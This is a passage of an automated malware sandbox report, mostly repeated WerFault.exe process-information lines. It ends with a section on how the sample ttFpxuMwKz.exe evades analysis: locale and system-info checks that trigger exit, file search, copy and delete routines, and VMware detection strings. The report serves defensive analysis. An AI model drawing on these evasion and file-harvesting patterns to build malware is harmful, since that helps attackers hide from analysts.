                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-26357)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Evaded block: after key decision (graph_0-27518)
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, API coverage: 6.5 %
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E430
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004138B0
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_00414570
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00414910
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040ED20
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BE70
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DE10
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004016D0
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040DA80
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_00413EA0
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F6B0
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007EE077
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007EF8F1 FindFirstFileA, 0_2_007EF8F1
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_007EDCE7
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_007EC0D7
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007E1937
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007EF917
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_007F4107
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_007EE697
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007F4B77
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_007F3B17
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_007F47D7
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_007EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_007EEF87
Source: C:\Users\user\Desktop\ttFpxuMwKz.exe, Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: Amcache.hve.4.dr, Binary or memory string: VMware
Source: Amcache.hve.4.dr, Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr, Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr, Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr, Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr, Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
